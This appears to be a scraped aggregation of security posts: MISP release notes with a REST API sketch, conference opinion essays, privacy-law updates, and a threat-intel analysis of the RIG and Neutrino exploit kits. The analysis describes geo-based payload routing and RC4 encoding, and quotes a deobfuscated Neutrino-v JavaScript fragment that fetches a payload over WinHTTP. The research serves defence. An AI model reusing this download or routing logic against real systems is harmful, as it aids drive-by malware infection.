  • Freetext feed import: a flexible scheme to import any feed available on the Internet and incorporate it automatically into MISP. An imported feed can create new events or update existing events. The freetext feed feature lets you preview the import and quickly integrate external sources.
  • Bro NIDS export added in MISP in addition to Snort and Suricata.
  • A default role can be set allowing flexible role policy.
  • Functionality to allow merging of attributes from a different event.
  • Many updates and improvements in the MISP user interface, including filtering of proposals at the index level.
Bug fixes and improvements include:
  • XML STIX export has been significantly improved to ensure enhanced compatibility with other platforms.
  • Bruteforce protection has been fixed.
  • OpenIOC export via the API is now possible.
  • Various bugs at the API level were fixed.
This is an outstanding project that will be the topic of my next Toolsmith In-depth Analysis.
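To give a feel for the automation pillar, indicators can be pushed to a MISP instance over its REST API with an API key in the Authorization header. Below is a minimal, stdlib-only sketch; the URL and key are placeholders, the attribute values are illustrative, and in practice the PyMISP client library is the more idiomatic way to do this:

```python
import json
import urllib.request

MISP_URL = "https://misp.example.org"    # placeholder: your MISP instance
API_KEY = "YOUR_AUTOMATION_KEY"          # placeholder: per-user key from the MISP UI

def build_event(info, attributes):
    """Build a minimal MISP event payload: one event carrying a list of
    attributes, each a (type, value) pair such as ("ip-dst", "203.0.113.5")."""
    return {
        "Event": {
            "info": info,               # free-text event description
            "distribution": 0,          # 0 = your organisation only
            "threat_level_id": 2,       # 2 = medium
            "analysis": 0,              # 0 = initial
            "Attribute": [{"type": t, "value": v} for t, v in attributes],
        }
    }

def push_event(payload):
    """POST the event to the MISP REST API (requires network access
    and a valid key; shown here for illustration)."""
    req = urllib.request.Request(
        MISP_URL + "/events",
        data=json.dumps(payload).encode(),
        headers={
            "Authorization": API_KEY,
            "Accept": "application/json",
            "Content-Type": "application/json",
        },
    )
    return urllib.request.urlopen(req)
```

Once events are in MISP this way, the correlation, feed, and Snort/Suricata/Bro export features described above operate on them automatically.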

Cheers...until next time.

Wrong About Conferences, part 3

Thought I’d get tired of this topic?  No way, I’m just getting warmed up.

Today’s installment continues on the events themselves:

A lot of people complain about the commercialization, the sales pitches, the circus-like atmosphere of some vendor areas.  I’m not a big fan of these things myself (OK, I loathe them), I prefer to engage with vendors in a rational manner- but whether you are buying antivirus, SIEM, a new car, or a washing machine, expect the sales hype.  If you are like me you’ll ignore the excesses and gravitate towards the companies who bring engineers and maybe even support personnel to accompany the sales and marketing teams  to shows so that they can answer hard questions and help existing customers.  And if you aren’t buying, or curious about the tech, avoid those parts of the events altogether (or as much as the venue allows).

The same events which have the big vendorfests are often the best for meeting people for quiet, meaningful conversations- not at the show but nearby, away from the mayhem.  If thousands of people go to the event, there may be folks there you want to talk to- and you don’t have to meet at the conference itself.  If you are going to do this, make appointments.  You will not just run into folks and have time to chat.  And “I’ll meet you in the lobby” isn’t good enough, especially at sprawling complexes like the Moscone Center in San Francisco, the Las Vegas Convention Center, and other huge venues.

The flip side of over-commercialization is the community events with little or no advertising and sales.  They are a great relief to many of us who suffer the excesses at commercial shows, but they don’t generate leads for the sponsors so it can be hard to pull in the funding needed for the event.  These events often get funded primarily through ticket sales because someone has to pay.  A lot of companies will provide sponsorship for visibility and the good of the community, but there are a lot of community conferences and not enough money for all of them.

The realms of for-profit, not-for-profit, and non-profit are too convoluted a topic for this series, but whether people want to make money from an event or not, they want people to like the event.

It is also worth mentioning the size of events.  Everyone wants to go to the cool events, and so some grow until they aren’t what they used to be, and a lot of folks complain about this.  When I hear such complaints I am reminded of what the sage Yogi Berra said many years ago about Rigazzi’s in St. Louis:

“Nobody goes there anymore, it’s too crowded”

But if events cap attendance and demand continues to grow they get accused of being exclusionary by some.  What’s a conference organizer to do?

You’ll note I’ve avoided naming specific events, although I’m sure most of you have assigned names to several things I’ve mentioned.  I would, however, like to use one specific group as an example, an example that could be applied to many other groups and events.  DC303, the Denver area DEF CON group, is well known and very active, and I’ve heard them accused of being “cliquish” and excluding people from activities and events.  I would like to make two points about DC303 (note, I am *not* a 303 member):

First, as with most organizations, some things are limited to members.  I can’t expect to toss my kayak in the bay and be welcomed down at the yacht club.  Some things are more open than others- and some do require an invitation, which leads to my second point:

My first interaction with the 303 crew was in July of 2009, at the first BSides Las Vegas.  I knew almost no one other than from a few online exchanges, and they certainly didn’t know me.  And it didn’t matter, I showed up and got to work as did several others- and many of us became friends.  That’s it, three simple steps: show up, participate, and be accepted.  If you skip step two you probably won’t make it to step three.  This applies at your local LUG or ISSA chapter as much as to 303 or pretty much any other entity.

Next week I’ll change topics a bit and babble about what’s wrong with presentations, speakers, and who knows what else.



Department of Defense Finalizes Rule for Cyber Incident Reporting

On October 4, 2016, the U.S. Department of Defense (“DoD”) finalized its rule implementing the mandatory cyber incident reporting requirements for defense contractors under 10 U.S.C. §§ 391 and 393 (the “Rule”). The Rule applies to DoD contractors and subcontractors that are targets of any cyber incident with a potential adverse impact on information systems and “covered defense information” on those systems.

The Rule leaves unchanged the requirement for reporting cyber incidents to DoD within 72 hours. The Rule, however, expands the requirement to impose a reporting obligation on all subcontractors “that are providing operationally critical support or for which subcontract performance will involve a covered contractor information system.” These subcontractors must report cyber incidents to any higher-tier subcontractor and to the prime contractor. A contractor’s report must contain the assessed impact of the cyber incident, a description of the technique or method used in the incident, a sample of any malicious software involved in the incident and a summary of the compromised information. Defense contractors also must provide the DoD with access to affected information or equipment to enable the DoD to conduct forensic analysis of the impact on DoD information. These requirements apply to all forms of agreements between the DoD and defense companies.

The Rule also modifies eligibility criteria for the voluntary Defense Industrial Base Cybersecurity (“DIB CS”) information sharing program to expand participation in the program. The DIB CS program is designed to facilitate sharing of cyber threat information between DoD and DIB CS participants and improve cybersecurity programs. The program is outside the scope of the mandatory cyber incident reporting requirements.

The Rule will take effect on November 3, 2016.

Wrong About Conferences, part 2

Today let’s start with a look at the conferences and events themselves.  One of the cyclical things I see is dismissing events people don’t like as irrelevant or worse.

“The big commercial cons are irrelevant…” as tens of thousands of people go to them, learn, share and yes, do the business of InfoSec.  The business of InfoSec, it’s so ugly and dirty, oh, and pays tens of thousands of us a living while funding an amazing amount of research.  Maybe they aren’t the places for cutting edge research, especially offensive security stuff, but that’s not their core audience.

Are there excesses? Sure there are.

Are they valuable to a lot of people?  Of course they are.

And very few people are forced to go unless they are paid to do so.

Don’t like it?  Not your scene?  Cool, don’t go.


“That’s just a hacker con, full of criminals…” as thousands or even tens of thousands of people gather to learn, share, and (gasp) maybe even do a little business.  Yeah, we’re all a bunch of criminals, right.  No, almost all of us at hacker cons are trying to make the world more secure.  You may disagree with some methods and opinions, but hacker cons help make us more secure.  Some may not be the best places to learn a lot about policy and compliance issues, or securing global enterprises, but that’s not what they’re about- and some “hacker” cons do cover these topics well.

Are there excesses? Sure there are.

Are they valuable to a lot of people?  Of course they are.

And very few people are forced to go unless they are paid to do so.

Don’t like it?  Not your scene?  Cool, don’t go.

Fifty years ago Buffalo Springfield sang “Nobody’s right if everybody’s wrong,” and that sums up the way I feel about a lot of the con noise, hype, and drama.  Find the events that work for you, contribute to making them better, and avoid the ones that don’t work for you.

There are plenty of things I don’t like about a lot of events, I’m a cranky old man.  I do, however, understand that different events serve different needs and audiences.  That doesn’t excuse hype, lies, and bullshit but no event has a monopoly on that.

More on events in the next few posts.



The Arc of a Data Breach: A 3-Part Series to Make Sure You’re Prepared

Episode 3: Lessons Learned

In the third segment of our 3-part series with Lawline, Lisa J. Sotto, head of our Global Privacy and Cybersecurity practice at Hunton & Williams LLP, discusses the details of the post-mortem following a data breach and the role of boards of directors before, during and after a breach. “We always want to revisit our incident response plan…and make changes to incorporate the lessons learned from a cyber event,” Sotto says. “We seek to ensure senior leadership understands how to prevent these events from happening in the future.”

View the third segment and the presentation materials.

CNIL Provides Update on Compliance Pack Regarding Connected Vehicles

On October 3, 2016, at the Paris Motor Show, the French Data Protection Authority (“CNIL”) reported on the progress of a new compliance pack on connected vehicles. The work was launched on March 23, 2016, and should be finalized in Spring 2017.

The compliance pack on connected vehicles will contain guidelines regarding the responsible use of personal data for the next generation of vehicles. It is currently drafted in cooperation with the automobile industry, innovative companies from the insurance and telecommunications sector, and public authorities.

The CNIL will distinguish between the three following scenarios:

  • “IN -> IN” scenario
    The data collected in the vehicle remains in that vehicle and is not to be shared with the service provider (e.g., an eco-driving solution that processes data directly in the vehicle in order to show eco-driving tips in real time on the vehicle’s dashboard).
  • “IN -> OUT” scenario
    The data collected in the vehicle is shared outside of the vehicle for the purposes of providing a specific service to the individual (e.g., when a pay-as-you-drive contract is purchased from an insurance company).
  • “IN -> OUT -> IN” scenario
    The data collected in the vehicle is shared outside of the vehicle to trigger an automatic action by the vehicle (e.g., in the context of a traffic solution that calculates a new route following a car incident).

The CNIL recalled the following:

  • All data that may be attributed to an identified or identifiable individual (e.g., via the license plate number or the vehicle serial number) qualifies as personal data subject to the French Data Protection Act and the EU General Data Protection Regulation (“GDPR”).  Information on the vehicle condition, the number of miles driven and driving style is personal data to the extent that this information may be attributed to an individual.
  • The compliance pack is intended to raise awareness amongst the automotive sector’s economic operators of the transparency and fairness principles when collecting personal data. Accordingly, operators should at least provide notice to individuals and even seek their consent. The CNIL recognized, however, that implementing an opt-in mechanism each time the vehicle is started may affect the driving experience. The data processing rules should be defined on a case-by-case basis, taking into account the scenario adopted, the type of data collected and users’ legitimate expectations.
  • Operators should adopt a Privacy by Design approach. This may include the implementation of easily configurable dashboards in order to ensure that individuals keep control over their data.
  • The CNIL encourages stakeholders to prefer the “IN -> IN” scenario that involves processing personal data locally, within the vehicle.

Compliance packs are a new toolkit developed by the CNIL to identify and disseminate best practices in a specific sector while simplifying the formalities to register the data processing for organizations that comply with such practices. They assist various stakeholders in the industry to prepare for the GDPR.

Everyone is wrong about conferences

In the past couple of years there have been many blog posts and articles on the topics of what’s wrong with InfoSec and hacker conferences, which events are or are not relevant, and what’s wrong with the talks and panels at those conferences.  A lot of good points have been raised, and some great ideas have been floated.

But they are all wrong.

Many of them aren’t just wrong, they’re also symptomatic of some of the things wrong with InfoSec, a failure to understand the importance of context and perspective.

Let’s start with this simple fact:

Your experience is unique, it is not universal.  Your perspective is therefore not a universal perspective.

As with anyone offering The One True Answer to any question, allow me to suggest that It Isn’t That Simple.

In upcoming posts I’ll dig into a few of these topics, not to give The One True Answer, but to share some of my experiences and perspectives, and float a few ideas of my own.  I don’t claim to be an expert on conferences or presentations (or much of anything else), but I am and have been involved in a lot of conferences- as an attendee, participant, program committee member, organizer, volunteer, vendor booth staff, speaker, and even bartender.  I also participate in events large and small, commercial and community, business- and hacker-centric.

And I have opinions.  You may have noticed.

Stay tuned.



CIPL and its GDPR Project Stakeholders Discuss DPOs and Risk under GDPR

In September, the Centre for Information Policy Leadership (“CIPL”) held its second GDPR Workshop in Paris as part of its two-year GDPR Implementation Project. The purpose of the project is to provide a forum for stakeholders to promote EU-wide consistency in implementing the GDPR, encourage forward-thinking and future-proof interpretations of key GDPR provisions, develop and share relevant best practices, and foster a culture of trust and collaboration between regulators and industry.  

Since the inaugural workshop in March 2016 in Amsterdam, participation in the project has grown significantly. The workshop was attended by almost 120 delegates from businesses, 12 data protection authorities (“DPAs”), four EU Member State governments, the EU Commission and the European Data Protection Supervisor, a non-DPA regulator, several academics and the IAPP. The fact that now over 70 companies are involved in this project speaks to the importance of the topic and the need to coordinate and benchmark among impacted stakeholders across the various sectors, in light of the tight deadline of May 25, 2018, when the GDPR becomes fully applicable.

The Paris workshop focused on two key areas under the GDPR: the role of the data protection officer (“DPO”) and the risk-based approach in the application of the GDPR (i.e., in connection with data protection impact assessments (“DPIAs”)). Both reflect key priorities of the Article 29 Working Party (“Working Party”) for developing its own GDPR implementation guidance, as well as the high importance of these two areas for the industry. Additional topics will be covered in future phases of the CIPL project.

Overall, the discussions of the day were a productive mix of a reality check, a wake-up call and encouragement. Particularly promising were instances of emerging consensus around several key implementation questions. While the discussions illustrated how many provisions under the GDPR remain unclear and how much work is left to be done before the quickly approaching implementation deadline, it was reassuring that no one seemed to be slow-pedaling their respective implementation responsibilities. Instead, we saw concentrated energy and commitment from all sides. There was a sense of shared responsibility for the successful and timely implementation of the GDPR between industry, DPAs, national governments and the EU Commission. Finally, it was also recognized that the lines of communication between regulators, industry and other stakeholders should stay open to ensure the best outcome for everybody.

Forthcoming Working Party GDPR Guidance

We learned that the Working Party will be releasing its first round of GDPR guidance before the end of the year or, at the latest, beginning of 2017, on data portability and the role of the DPO. Subsequently, the Working Party plans to release guidance on risk, DPIAs and certifications. Also, the Working Party is on the verge of publishing the report from its first GDPR “FabLab” meeting in July 2016.

The GDPR Represents a Revolution, Not an Evolution

A non-private sector participant also posited that the GDPR represents more of an “evolution” than a “revolution.” The predominant view, however, expressed not only by industry, was that “revolution” was the more accurate term. The familiar concepts of the GDPR will have to be interpreted against a backdrop of a changing technological and digital environment. Also, many of the new obligations for industry and DPAs will require a comprehensive retooling of organizational privacy programs and regulatory enforcement structures, among other changes. Participants stressed the need for timely guidance, frequent updates and full transparency from both DPAs and EU Member States during the implementation process.

EU Member States and DPAs Are Pressing Forward on National Implementation

A tour de table by all present EU Member State representatives and DPAs to update on their progress on national implementation of the GDPR drove home the sheer magnitude and complexity of the involved tasks. They included (1) reviewing the existing data protection laws and updating them in light of the GDPR; (2) coordinating among relevant government bodies; (3) considering how to deal with the margin of maneuver for EU Member States under the GDPR in various clauses; (4) resourcing and restructuring the DPAs for their expanded responsibilities; (5) developing implementation guidance; and (6) coordinating across EU Member States, for example via the Working Party and the European Commission.

The public sector delegates, who are personally involved in the national implementation and transition work, are keenly aware of the challenges facing the industry as it tries to come into compliance by May 2018. Among other things, these representatives pointed to corporate budget cycles that define and circumscribe the resources that will be available for GDPR implementation over the next 20 months even though the necessary resources cannot properly be calculated given the uncertainties of what the GDPR requires.

The Role of the DPO

The first main discussion of the day concerned the practical implementation of the new DPO obligations. Some of the key takeaways, on which there appeared to be general agreement among most of the stakeholders present, included the following:

  • The GDPR expands the traditional compliance function of a data protection officer to a broader, more strategic role, including that of business advisor on the responsible and innovative use of personal data. Given the various functions and skill-sets that must be combined in the DPO, they can be described as a chef d’orchestre with respect to an organization’s strategic use, management and protection of personal data. Certainly, the DPO should not be viewed as an internal “police officer”; a “privacy champion” might be a more fitting description.
  • The DPO must be one person who is responsible for data protection within the organization, but the relevant DPO skills and expertise required by the GDPR can be drawn from the entire DPO team across multiple jurisdictions. “Cloud expertise is good, cloud responsibility is not good,” one of the DPAs noted.
  • A non-mandatory (or voluntary) DPO appointed under Article 37(4) must meet all of the DPO requirements of the GDPR.
  • Some organizations may not wish to appoint a DPO if they are not legally required to do so under the GDPR. If an organization that is not legally required to appoint a mandatory DPO under the GDPR nevertheless wishes to create a data protection role or function within the organization outside of the GDPR requirements, it must give that role or function a different name, such as “Chief Privacy Officer,” or “Data Protection Director or Lead.” (The title of “Data Protection Officer” has now been claimed by the GDPR).
  • Generally, DPAs should find ways to incentivize the appointment of a DPO or a person with equivalent responsibilities for all organizations, including SMEs and start-ups.
  • The criteria of “core activities,” “regular and systematic monitoring” and “large scale” as triggers for mandatory DPO appointment under the GDPR cannot easily be further clarified and defined by additional objective, external criteria. For the most part, their application must be flexible and context-specific and left to the judgment of the organization deciding whether a DPO is required, keeping in mind that organizations must be able to demonstrate and justify their decisions.
  • “Core activities” does not include monitoring of employees or other parties on the company’s premises (IT monitoring and/or video surveillance), including monitoring of company emails, assets and systems for security purposes; the use of analytics tools for purposes such as understanding customers’ use of online products or improving products or workforce allocation; and activities required by law.
  • It does not matter where the DPO is located geographically as long as there is effective implementation of the GDPR requirements, including those relating to the organizational reporting lines pertaining to the DPO and the requirements relating to the DPO’s accessibility to individuals and DPAs.
  • A DPO does not need to be in the location of the organization’s main establishment and lead supervisory authority.
  • Accessibility of the DPO to individuals can be provided via local DPO staff or technology.
  • The GDPR does not provide for personal liability of the DPO. This makes sense in light of the fact that, under the GDPR, the DPO is, in essence, an internal advisor and the controller is responsible for data protection decisions. Most participants agreed that imposing personal liability on DPOs would not be helpful. However, EU Member States’ law (such as criminal or corporate law) could impose additional liability or penalties.
  • It is not the DPAs’ responsibility to create or impose further DPO qualification standards or certifications. To the extent DPO certifications are desired, they should be developed by the market. Universities could play a role. However, DPAs have a role in encouraging such certifications and helping to create networks of DPOs.
  • Formal certification should not be required for DPOs; instead, hiring organizations should be able to use their judgement and consider the general experience and knowledge of a DPO candidate on a case-by-case basis.
  • An external DPO could be a legal person; however, an individual has to be the main contact.
  • External DPOs are a valid choice for SMEs and start-ups.
  • The DPO’s task of “monitoring compliance” within an organization is not a formal audit function that could potentially be at odds with the task of “advising” the organization, but refers to the DPO’s obligation to oversee and ensure on an ongoing basis that the organization implements all applicable GDPR requirements.
  • The DPO’s “consultation” role with respect to the DPAs (including “prior consultation” regarding high-risk activities) is important, but there is an expectation on the part of DPAs that such consultations will be the exception rather than the rule. DPAs are not resourced for frequent consultations. On the other hand, industry confirmed that there is a need for ongoing informal consultation and constructive dialogue between the DPO and the DPA. This should be encouraged by both sides.

Risk, High-Risk and DPIAs

The second major issue of the day was the role of risk under the GDPR. Specifically, participants discussed possible interpretations and further guidance relating to the nature and methodology of risk assessments, including in connection with DPIAs. Key takeaways and messages included the following:

  • There was consensus that considering the benefits of a data processing activity should be part of a GDPR risk assessment. Benefits are relevant both in the context of devising appropriate mitigations (so as to avoid mitigating the benefits away) and when deciding whether to proceed with processing, given the residual risk.
  • Article 35(1) provides that DPIAs are only required once with respect to “similar processing operations that present similar risks.” This is designed to prevent unnecessary and duplicative DPIAs. Any further guidance on DPIAs should highlight this important feature and clarify its meaning and application.
  • Article 35(3) sets forth three apparent “default” high-risk categories that automatically require a DPIA. A question was raised as to whether this “high-risk” classification can be rebutted based on the “nature, scope, context and purposes” (Article 35(1)) of the proposed processing at issue before reaching the DPIA stage. Future guidance might address this question.
  • “Using new technology” cannot be the sole trigger for “high-risk” status or a DPIA. This criterion must be coupled with additional “high-risk” triggers that depend on the nature, purpose, context and scope of processing. Any future guidance should narrow the scope of what is meant by “new technology.” Otherwise, almost every new data processing activity is captured by it.
  • Further guidance on “high risk” from the DPAs should not be too “bureaucratic.” It should feature characteristics and criteria of “high risk” rather than a list that specifies per se “high-risk” activities. Prior consultation with stakeholders before releasing final guidance on the meaning of “high risk” would be helpful.
  • Flexibility in determining how to score, measure and weigh the risks and benefits in a specific processing context is key and should be left to individual organizations. Also, no specific risk assessment process or methodology should be mandated. However, high-level guidance on the general contours of a risk assessment methodology or process might be helpful.
  • The Working Party may base its further guidance on existing DPIA guidance by national DPAs.
  • Considering appropriate mitigations requires taking into account the reasonable expectations of individuals, transparency and the elements of fair processing.
  • “Prior consultations” with DPAs regarding DPIAs that demonstrate “high risk” despite mitigations should be the exception rather than the rule.
  • There may be future DPA guidance on mitigation measures by way of “mitigation scenarios.”
  • Many organizations roll out new products globally without variation between countries. Thus, risk assessments must comprehensively assess the global impact of a product. Any further DPA guidance on the elements and methodology of risk assessment must be workable in that context.
  • The GDPR provides for “seeking the views” of individuals or their representatives in the context of a DPIA “where appropriate.” This obligation must be limited by the organizations’ commercial interests, IP rights and security considerations. Future DPIA guidance should acknowledge that under common product roll-out practices, for example, there may not be an opportunity for prior consultation with individuals before such roll-out. However, in some circumstances feedback from individuals, including on user experience, may be obtained during pre-roll-out limited testing phases.
  • The original intent behind the risk-based approach was to enable broader, but more accountable, use of personal data. If the GDPR’s risk-based approach is implemented in an overly bureaucratic fashion, it runs the risk of merely adding compliance obligations without any corresponding benefits in terms of effective, innovative and accountable data use.

Risk-based Enforcement and Oversight by the DPAs

Workshop participants also considered how the risk-based approach might enable more effective data protection oversight and enforcement by the DPAs. This discussion was designed to kick off a new work stream within CIPL’s GDPR Implementation Project that will specifically explore the issue of “smart regulation.”

In a nutshell, this discussion was premised on the idea that DPAs will not be able to fulfill all the new tasks, powers and functions assigned to them by the GDPR, unless they make choices and set priorities. It was pointed out that while the GDPR does not explicitly ask for prioritization based on strategic importance or impact, DPAs must, nevertheless, make realistic and prudent choices. One mechanism to facilitate such choices would be to apply the risk-based approach to the DPAs’ various tasks and responsibilities, enabling them to prioritize actions according to risk, importance and impact.

By way of an example, the participants considered the DPA’s role as an ombudsman for complaints. This role, arguably, is the least important of the DPA’s roles, compared with those of “leader,” “authorizer” and “enforcer.” Yet, depending on the volume of complaints (many of which could be of limited importance or merit), the ombudsman role has the potential to monopolize the time and resources of the DPAs, thereby limiting their ability to perform their other functions effectively.

As mentioned, solutions to this and other problems relating to DPA effectiveness will be the subject of the “smart regulation” work stream. By incorporating the concepts of organizational accountability, the risk-based approach and certifications and codes of conduct, the GDPR’s ambition was to enable organizations to do better in the future, to share the regulatory burden with DPAs and, ultimately, to better protect individuals. Whether all this will be sufficient to obviate the DPAs’ need to prioritize remains to be seen. Better to cover all bases and plan for responsible risk-based prioritization amongst all stakeholders.

Next Steps

To do our part in enabling timely GDPR compliance, CIPL will finalize two white papers and formal recommendations concerning the DPO and risk in the coming weeks and then turn to our next set of priority issues under the regulation, including certifications and codes of conduct, innovation drivers, consent/legitimate interest, transparency and smart regulation.

The next, smaller multistakeholder workshop will be in Brussels on November 8, 2016, on the issue of certifications and codes. Afterwards, the next major GDPR Project workshop will be in February or early March in a European location to be determined.

EDPS Issues Opinion on Coherent Enforcement of Fundamental Rights in the Age of Big Data

On September 23, 2016, the European Data Protection Supervisor (the “EDPS”) released Opinion 8/2016 (the “Opinion”) on the coherent enforcement of fundamental rights in the age of big data. The Opinion updates the EDPS’ Preliminary Opinion on Privacy and Competitiveness in the Age of Big Data, first published in 2014, and provides practical recommendations on how the EU’s objectives and standards can be applied holistically across the EU institutions. According to the EDPS, the Digital Single Market Strategy presents an opportunity for a coherent approach with respect to the application of EU rules on data protection, consumer protection, antitrust enforcement and merger control. In addition, the EDPS calls for greater dialogue and cooperation between data protection, consumer and competition authorities in order to protect the rights and interests of individuals, including the rights to privacy, freedom of expression and non-discrimination.

In particular, the Opinion makes the following recommendations:

  • A digital enforcement clearing house. The EDPS proposes the establishment of a digital clearing house for enforcement in the EU digital sector, which will consist of a voluntary network of contact points in national and EU regulatory authorities responsible for regulation in the digital sector. These authorities must be willing to (1) enhance their respective enforcement activities, with a particular focus on individual rights, and (2) share information and ideas on how to ensure web-based service providers are held accountable for their conduct. The Digital Clearing House could, among other tasks, discuss the legal regime for pursuing specific cases or complaints related to online services, identify potential opportunities to raise awareness at the European level, and assess the impact of sanctions and remedies on individuals’ digital rights and interests.
  • An EU values-based common area on the web. According to the EDPS, EU institutions should, with the help of external experts, explore the creation of a common area on the web where individuals are able to interact without being tracked, in line with the EU Charter of Fundamental Rights (the “EU Charter”). In addition, EU institutions should also encourage the development and application of technical solutions to respect individuals’ expressed preferences with respect to privacy.
  • Improve representation of the individual’s interest in big data mergers. The EDPS supports greater scrutiny of proposed acquisitions of digital companies that have gathered significant quantities of personal data. In addition, according to the EDPS, Council Regulation No. 139/2004 of January 2004, on the control of concentrations between undertakings, should be interpreted and amended in the future to protect the rights to privacy, data protection and freedom of expression online as provided for in the EU Charter.

CISPE Unveils Cloud Providers Code of Conduct

On September 27, 2016, Cloud Infrastructure Services Providers in Europe (“CISPE”) published its Data Protection Code of Conduct (the “Code”). CISPE, a relatively new coalition of more than 20 cloud infrastructure providers with operations in Europe, has focused the Code on transparency and compliance with EU data protection laws.

Highlights of the Code include:

  • a requirement that cloud customers are offered the ability to process and store their data exclusively within the EEA;
  • a “Trust Mark” awarded to compliant cloud infrastructure providers, and a listing on the CISPE website; and
  • a prohibition on the use of customers’ personal data for cloud infrastructure service providers’ own benefit or the sale of such data to third parties.

Currently, cloud infrastructure service providers may demonstrate their compliance with the Code either by certification from independent third-party auditors or by self-certifying compliance. Customers may verify the service provider’s compliance through the CISPE website.

CISPE claims that the Code is based on internationally recognized security standards and is compliant with the requirements of the EU’s General Data Protection Regulation, which becomes applicable across all EU Member States in May 2018.


DerbyCon was fantastic again this year, with talks from some of the best and brightest in NetSec. If you're not familiar with it, it's been held each year in September in Louisville, Kentucky since 2011. Admission to the conference (3 days) is only $175.00, and there are (relatively) inexpensive training classes held in the two days before the con. If you've never been to a hacker conference, I highly recommend DerbyCon. The atmosphere is very friendly and helpful, and even someone brand new to NetSec can find plenty to learn and participate in. There is a lock pick village, a hardware hacking village, a SOHO router hacking room, a Capture The Flag contest and lots more, as well as official parties Friday and Saturday nights. This was my fifth year attending, and it gets better each time.
All the talks are recorded and available on Adrian Crenshaw's web site. This year's talks are at:

RIG evolves, Neutrino waves goodbye, Empire Pack appears

  Neutrino waves Goodbye

Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware.

Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016

RIG += internal TDS:

Trying to understand that move, I suspected, and then confirmed, the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit. [Edit 2016-10-08: it seems this functionality is limited to the Empire Pack version of RIG.]
I believe this feature first appeared on the EK market with Blackhole (if you are aware of a TDS integrated directly into an EK earlier, please tell me)

Picture2: Blackhole - 2012 - Internal TDS illustration

but disappeared from the market with the end of Nuclear Pack

Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustration

and Angler EK

Picture 4 : Angler EK - Internal TDS illustration

This is a key feature for load sellers: it makes their day-to-day work with traffic providers far easier.
It allows the exploit kit operator to attach multiple payloads to a single thread; which payload is dropped is conditioned on the victim's geo (and/or OS settings).

Obviously you can achieve the same result with any other exploit kit, but things are a little more difficult: you have to create one exploit kit thread per payload, use an external TDS (such as Keitaro, Sutra, BlackHat TDS, SimpleTDS, BossTDS, etc.) and, from that TDS, point the traffic to the correct exploit kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country).

Picture 5: A Sutra TDS in action in 2012 - cf The path to infection
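The geo-conditioned drop logic described above can be sketched in a few lines (a minimal illustration in Python; the country codes, payload names and `route_payload` helper are hypothetical, not taken from any actual kit):

```python
# Minimal sketch of an internal TDS: pick the payload for a single EK thread
# based on the victim's geolocation. All mappings here are hypothetical.
GEO_PAYLOADS = {
    "GB": "banker_uk.exe",  # geo-focused banker for UK traffic
    "DE": "banker_de.exe",
    "JP": "banker_jp.exe",
}
DEFAULT_PAYLOAD = "ransomware.exe"  # fallback for unmatched geos

def route_payload(country_code: str) -> str:
    """Return the payload a victim in `country_code` would receive."""
    return GEO_PAYLOADS.get(country_code.upper(), DEFAULT_PAYLOAD)
```

An internal TDS bakes this lookup into the kit itself, so one thread can serve every geo; the external-TDS route described above forces one thread per payload instead.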

RIG += RC4 encryption, dll drop and CVE-2016-0189:

Around 2016-09-12 a variation of RIG (which I flag as RIG-v in my systems) appeared:
a slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavior, and the addition of CVE-2016-0189.

Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo

Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.
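RC4, mentioned above as the new encoding layer in RIG-v, is simple enough to sketch (a generic textbook RC4 in Python, for illustration only; this is not RIG's actual code):

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Generic RC4: KSA then PRGA. Encryption and decryption are identical."""
    # Key-scheduling algorithm (KSA): permute S under the key
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA), XORed against the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)
```

Because RC4 is a plain XOR stream cipher, applying `rc4` twice with the same key round-trips the data, which is why a kit can use the same routine on both ends.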

Neutrino waves goodbye ?

On 2016-09-09, a Jabber message from the Neutrino seller's account was reported on the underground:
“we are closed. no new rents, no extends more”
This explains a lot. Here are some of my last Neutrino passes from the past month.
Picture 8: Some Neutrino passes for past month and associated taxonomy tags in Misp

As you can see, several actors were still using it. Now here is what I get for the past few days:
Picture 9: Past days in DriveBy land
Not shown here: Magnitude is still around, mostly striking in Asia.

Day after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground.

Picture 10: Last banner for Neutrino as of 2016-09-16

Are we witnessing the end of Neutrino Exploit Kit? To some degree. In fact, it looks more like Neutrino is going full “private” mode, à la Magnitude.
Side reminder: Neutrino disappeared from March 2014 till November 2014.

A Neutrino Variant

Several weeks ago, Trendmicro (thanks!) made me aware of a malvertising chain they had spotted in Korea and Taiwan involving Neutrino.

Picture 11: Neutrino-v pass on the 2016-09-21

Upon replay, I noticed that this Neutrino was somewhat different: a smoother CVE-2016-4117, more randomization in the landing, and a slightly modified Flash bundle of exploits.

Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder
Note the pnw26 with no associated binary data, the rubbish and additionalInfo

A Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523

Picture 13: Neutrino-v behavioral is a little different: drop names are not generated via the GetTempName API

 function k2(k) {
     var y = a(e + "." + e + "Request.5.1"); // resolves to WinHttp.WinHttpRequest.5.1
     y.setProxy(n);
     y.open("GET", k(1), n);
     y.Option(n) = k(2);
     if (200 == y.status) return Rf(y.responseText, k(n))
 }
Neutrino-v ensures WScript will use the default proxy (most often, when a proxy is configured, it is only set for WinINet; the WinHTTP proxy is not set, so WScript would otherwise try to connect directly and fail).

I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it)

Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079x
The actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.

Empire Pack:

Coincidentally, a new exploit kit is being talked about on the underground: Empire Pack. Private, not advertised.

Picture 15: King of Loads - Empire Pack Panel

